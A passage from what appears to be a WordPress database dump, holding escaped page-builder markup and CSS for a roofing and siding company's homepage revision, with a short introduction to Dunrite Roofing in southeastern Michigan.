}\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\" rel=\"noopener noreferrer\" target=\"_blank\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/skt-blocks-post-grid {\"postsToShow\":2,\"displayPostExcerpt\":false,\"displayPostAuthor\":false,\"postTitleTag\":\"h5\",\"readMoreText\":\"Read More\",\"bgColor\":\"#ffffff\",\"imageBorderRadius\":0,\"metaColor\":\"#6a6a6a\",\"readMoreLinkColor\":\"#fc8134\",\"titleColor\":\"#282828\",\"titleHoverColor\":\"#0d2e63\",\"contentPadding\":0,\"continueFontSize\":16,\"continueFontWeight\":\"600\",\"titleFontSize\":24,\"titleLineHeight\":1.2,\"titleFontWeight\":\"400\",\"metaFontSize\":16,\"metaFontWeight\":\"400\",\"metaTextTransform\":\"capitalize\",\"titleFontFamily\":\"Poppins\",\"metaFontFamily\":\"Poppins\",\"rowGap\":0,\"postGridBlockId\":\"eca83834\"} /--></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-24 23:15:52','2022-08-24 23:15:52','',336,'https://cteisys.com/?p=483',0,'revision','',0),(482,1,'2022-08-24 23:11:37','2022-08-24 23:11:37','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"f90851d4-c514-47ae-86e7-eec3151567da\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-f90851d4-c514-47ae-86e7-eec3151567da background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-f90851d4-c514-47ae-86e7-eec3151567da.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(255, 255, 255, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"ec9b4f49-717b-424d-8c1f-2e6b2881e683\"} -->\n<style type=\"text/css\"> .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\"} -->\n<style type=\"text/css\"> .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"2d0e433e-b09c-451a-a1f6-274a9de78652\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-2d0e433e-b09c-451a-a1f6-274a9de78652 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"88555fca-6dda-4435-9d42-f653c9586df1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-88555fca-6dda-4435-9d42-f653c9586df1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"cd3cb9ff-14b9-4cad-bfef-2367d403384a\"} -->\n<style type=\"text/css\"> .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cd3cb9ff-14b9-4cad-bfef-2367d403384a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"0f159bdd-7f31-4f5d-8116-79161efa80a9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-0f159bdd-7f31-4f5d-8116-79161efa80a9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"426cabfe-a2cd-4360-aecf-17fd567995fe\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-426cabfe-a2cd-4360-aecf-17fd567995fe background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"6a199a30-74a8-487c-b888-156f1279eaf9\"} -->\n<style type=\"text/css\"> .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6a199a30-74a8-487c-b888-156f1279eaf9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"5a7066fe-d425-4153-8844-d8ae7a4116af\"} -->\n<style type=\"text/css\"> .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n 